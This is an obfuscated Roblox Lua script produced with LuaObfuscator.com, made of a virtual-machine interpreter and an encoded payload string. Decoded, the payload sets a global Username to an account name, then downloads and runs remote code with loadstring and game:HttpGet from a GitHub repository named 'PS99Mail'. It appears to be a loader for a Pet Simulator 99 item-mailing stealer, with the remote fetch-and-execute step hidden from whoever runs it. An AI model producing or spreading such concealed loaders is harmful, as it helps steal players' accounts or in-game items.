[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v84=0;local v85;while true do if (v84==(0 -0)) then v85=(v31/(2^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-((558 + 62) -(555 + 64)))) + (932 -((1221 -364) + 74)))) ;return v85-(v85%(569 -(367 + 201))) ;end end else local v86=927 -(214 + 713) ;local v87;while true do if (v86==0) then v87=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v87 + v87))>=v87) and (878 -(282 + 595))) or (1637 -(1523 + (1179 -(68 + 997)))) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0;local v35;local v36;local v37;local v38;while true do if ((1271 -(226 + 1044))==v34) then return (v38 * (31011612 -14234396)) + (v37 * (285370 -219834)) + (v36 * (373 -(32 + (337 -252)))) + v35 ;end if (v34==((952 -(802 + 150)) + 0)) then v35,v36,v37,v38=v1(v16,v19,v19 + 1 + (5 -3) );v19=v19 + (9 -5) ;v34=958 -(892 + 65) ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 -0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v39~=4) then else while true do if (v40~=2) then else local v102=0;while true do if (v102~=1) then else v40=3;break;end if (v102==(0 + 0)) then v45=nil;v46=nil;v102=1;end end end if (3~=v40) then else v47=nil;while true do local v105=0;while true do if ((0 -0)~=v105) then else if (v41==(2 + 0)) then local v132=0;while true do if (v132==1) then for v175=1475 -(1329 + 145) ,v24() do local v176=971 -(140 + 831) ;local v177;while true do if (0==v176) then v177=v22();if (v21(v177,1,1)~=(1850 -(1409 + 441))) then else local v189=0;local v190;local v191;local v192;local v193;while true do if (v189==2) then while true do if (v190==2) then local v197=718 -(15 + 703) ;while true do if ((0 + 0)==v197) then if (v21(v192,439 -(262 + 176) ,1)~=(1722 -(345 + 1376))) then else v193[690 -(198 + 490) ]=v47[v193[8 -6 ]];end if (v21(v192,4 -2 ,2)==(1207 -(696 + 510))) then v193[3]=v47[v193[3]];end v197=1 -0 ;end if (v197==1) then v190=1265 -(1091 + 171) ;break;end end end if (v190==(1 + 2)) then if (v21(v192,3,9 -6 )~=1) then else v193[4]=v47[v193[4]];end v42[v175]=v193;break;end if (v190==(0 -0)) then v191=v21(v177,2,3);v192=v21(v177,4,6);v190=375 -(123 + 251) ;end if (v190~=(4 -3)) then else local v199=698 -(208 + 490) ;while true do if (v199~=(0 + 0)) then else v193={v23(),v23(),nil,nil};if (v191==(202 -(14 + 188))) then local v206=0;while true do if (v206~=(675 -(534 + 141))) then else v193[2 + 1 ]=v23();v193[4 + 0 ]=v23();break;end end elseif (v191==(1 + 0)) then v193[6 -3 ]=v24();elseif (v191==2) then v193[4 -1 ]=v24() -(2^16) ;elseif (v191~=(8 -5)) then else local v211=0;local v212;local v213;local v214;while true do if ((0 + 0)==v211) then v212=0;v213=nil;v211=1 + 0 ;end if (v211==1) then v214=nil;while true do if (v212~=0) then else local v215=0;while true do if (v215~=0) then else v213=396 -(115 + 281) ;v214=nil;v215=2 -1 ;end if (v215==1) then v212=1 + 0 ;break;end end end if (1~=v212) then else while true do if (v213==0) then v214=0;while true do if (v214==0) then v193[7 -4 ]=v24() -((7 -5)^(883 -(550 + 317))) ;v193[4]=v23();break;end end break;end end break;end end break;end end end v199=1;end if (v199==(1 -0)) then v190=2 -0 ;break;end end end end break;end if (v189~=(0 -0)) then else local v194=0;while true do if (v194~=(286 -(134 + 151))) then else v189=1;break;end if (v194~=0) then else v190=0;v191=nil;v194=1;end end end if (v189==(1666 -(970 + 695))) then local v195=0 -0 ;while true do if ((1991 -(582 + 1408))==v195) then v189=2;break;end if (v195==(0 -0)) then v192=nil;v193=nil;v195=1;end end end end end break;end end end v41=3;break;end if (v132==0) then local v168=0;while true do if (v168~=0) then else for v182=1,v46 do local v183=0;local v184;local v185;local v186;while true do if (v183==(1 -0)) then v186=nil;while true do if ((3 -2)==v184) then if (v185==1) then v186=v22()~=(1824 -(1195 + 629)) ;elseif (v185==(2 -0)) then v186=v25();elseif (v185==3) then v186=v26();end v47[v182]=v186;break;end if (v184==0) then v185=v22();v186=nil;v184=1;end end break;end if (v183==(241 -(187 + 54))) then v184=0;v185=nil;v183=1;end end end v45[783 -(162 + 618) ]=v22();v168=1;end if (v168==(1 + 0)) then v132=1 + 0 ;break;end end end end end if (v41==(1 -0)) then local v133=0;while true do if (v133==(1 -0)) then v47={};v41=1 + 1 ;break;end if (v133~=0) then else v45={v42,v43,nil,v44};v46=v24();v133=1 -0 ;end end end v105=1 -0 ;end if (1~=v105) then else if (v41~=(1387 -(746 + 638))) then else local v134=0;local v135;while true do if (v134==0) then v135=0 + 0 ;while true do if (v135==(0 -0)) then for v187=342 -(218 + 123) ,v24() do v43[v187-(1582 -(1535 + 46)) ]=v29();end return v45;end end break;end end end if (v41==(0 + 0)) then local v136=0;local v137;while true do if (v136==0) then v137=0;while true do if ((1 + 0)==v137) then v44={};v41=561 -(306 + 254) ;break;end if (v137~=(0 + 0)) then else local v181=0;while true do if (v181==(0 -0)) then v42={};v43={};v181=1468 -(899 + 568) ;end if (v181~=(1 + 0)) then else v137=2 -1 ;break;end end end end break;end end end break;end end end break;end if (v40==(603 -(268 + 335))) then local v103=0;while true do if (v103==1) then v40=291 -(60 + 230) ;break;end if (v103==0) then v41=0;v42=nil;v103=1;end end end if (v40~=(573 -(426 + 146))) then else local v104=0;while true do if (v104~=(1 + 0)) then else v40=1458 -(282 + 1174) ;break;end if (v104~=(811 -(569 + 242))) then else v43=nil;v44=nil;v104=2 -1 ;end end end end break;end if (v39~=(1 + 1)) then else v44=nil;v45=nil;v39=1027 -(706 + 318) ;end if (v39~=0) then else v40=0;v41=nil;v39=1;end if (v39==(1254 -(721 + 530))) then v46=nil;v47=nil;v39=1275 -(945 + 326) ;end if (v39~=1) then else v42=nil;v43=nil;v39=4 -2 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=v24();local v49=v24();local v50=1 + 0 ;local v51=(v21(v49,(571 + 130) -(271 + 429) ,3 + 16 + 1 ) * ((1502 -(1408 + 92))^(1118 -(461 + 625)))) + v48 ;local v52=v21(v49,7 + (27 -13) ,1319 -(993 + 295) );local v53=((v21(v49,94 -62 )==((66 -(30 + 35)) + 0)) and  -1) or (2 -1) ;if (v52==(1171 -(288 + 130 + 753))) then if (v51==0) then return v53 * (0 + 0) ;else local v92=0 + 0 ;while true do if (v92==(0 + 0)) then v52=(1258 -(1043 + 214)) + 0 ;v50=529 -(406 + 123) ;break;end end end elseif (v52==(7738 -5691)) then return ((v51==(1769 -(1749 + 20))) and (v53 * ((1 -0)/(0 -0)))) or (v53 * NaN) ;end return v8(v53,v52-(243 + 780) ) * (v50 + (v51/((1324 -((2461 -(323 + 889)) + 73))^(19 + 33)))) ;end v26=nil;function v26(v54)local v55=0 -0 ;local v56;local v57;while true do if (v55==(583 -((487 -(116 + 10)) + 219))) then return v6(v57);end if (v55==(320 -(4 + 49 + 267))) then v56=nil;if  not v54 then local v101=0 + (738 -(542 + 196)) ;while true do if ((413 -(15 + (853 -455)))==v101) then v54=v24();if (v54==(982 -(18 + 282 + 682))) then return "";end break;end end end v55=3 -2 ;end if ((2 + 0)==v55) then v57={};for v93=1 + 0 , #v56 do v57[v93]=v2(v1(v3(v56,v93,v93)));end v55=(434 + 419) -(20 + 830) ;end if (v55==1) then v56=v3(v16,v19,(v19 + v54) -1 );v19=v19 + v54 ;v55=2 + 0 ;end end end v18=5;end if (v18==2) then function v22()local v58=0;local v59;while true do if ((0 + 0)==v58) then v59=v1(v16,v19,v19);v19=v19 + (2 -1) ;v58=1;end if (v58==(2 -1)) then return v59;end end end v23=nil;function v23()local v60=1551 -(1126 + 425) ;local v61;local v62;while true do if ((405 -(118 + 287))==v60) then v61,v62=v1(v16,v19,v19 + (7 -5) );v19=v19 + (1123 -(118 + 1003)) ;v60=2 -1 ;end if ((378 -(142 + 52 + 183))==v60) then return (v62 * (1161 -905)) + v61 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v63)if (v1(v63,2)==79) then v20=v0(v3(v63,1,1));return "";else local v88=v2(v0(v63,16));if v20 then local v95=0;local v96;while true do if (v95==0) then v96=v5(v88,v20);v20=nil;v95=1;end if (v95==1) then return v96;end end else return v88;end end end);v18=1;end if (v18==7) then function v30(v64,v65,v66)local v67=v64[1];local v68=v64[2];local v69=v64[3];return function(...)local v70=v67;local v71=v68;local v72=v69;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v89=0,v78 do if (v89>=v72) then v76[v89-v72 ]=v77[v89 + 1 ];else v80[v89]=v77[v89 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=4) then if (v83<=1) then if (v83==0) then if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v66;else v80[v82[2]]=v66[v82[3]];end else v80[v82[2]]();end elseif (v83<=2) then local v106=v82[2];v80[v106]=v80[v106](v13(v80,v106 + 1 ,v75));elseif (v83==3) then v80[v82[2]]=v82[3];else do return;end end elseif (v83<=7) then if (v83<=5) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83>6) then local v119=0;local v120;local v121;while true do if (v119==0) then v120=v82[2];v121=v80[v82[3]];v119=1;end if (v119==1) then v80[v120 + 1 ]=v121;v80[v120]=v121[v82[4]];break;end end else v66[v82[3]]=v80[v82[2]];end elseif (v83<=8) then local v108=0;local v109;local v110;local v111;local v112;while true do if (v108==2) then for v138=v109,v75 do v112=v112 + 1 ;v80[v138]=v110[v112];end break;end if (v108==1) then v75=(v111 + v109) -1 ;v112=0;v108=2;end if (v108==0) then v109=v82[2];v110,v111=v73(v80[v109](v13(v80,v109 + 1 ,v82[3])));v108=1;end end elseif (v83>9) then v74=v82[3];else local v125=0;local v126;local v127;local v128;local v129;local v130;while true do if (v125==2) then if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v66;else v80[v82[2]]=v66[v82[3]];end v74=v74 + 1 ;v82=v70[v74];v130=v82[2];v129=v80[v82[3]];v125=3;end if (v125==1) then v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v66;else v80[v82[2]]=v66[v82[3]];end v74=v74 + 1 ;v82=v70[v74];v125=2;end if (v125==0) then v126=nil;v127,v128=nil;v129=nil;v130=nil;v66[v82[3]]=v80[v82[2]];v125=1;end if (v125==5) then v126=0;for v166=v130,v75 do local v167=0;while true do if (v167==0) then v126=v126 + 1 ;v80[v166]=v127[v126];break;end end end v74=v74 + 1 ;v82=v70[v74];v130=v82[2];v125=6;end if (v125==7) then v82=v70[v74];v74=v82[3];break;end if (4==v125) then v74=v74 + 1 ;v82=v70[v74];v130=v82[2];v127,v128=v73(v80[v130](v13(v80,v130 + 1 ,v82[3])));v75=(v128 + v130) -1 ;v125=5;end if (v125==6) then v80[v130]=v80[v130](v13(v80,v130 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v125=7;end if (v125==3) then v80[v130 + 1 ]=v129;v80[v130]=v129[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v125=4;end end end v74=v74 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!073O00028O0003083O00557365726E616D6503113O006769616E6361726C6F626172612O626138030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000F3O0012033O00013O0026053O00010001000100040A3O00010001001203000100033O001209000100023O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O000E000100040A3O000100012O00043O00017O00",v9(),...);
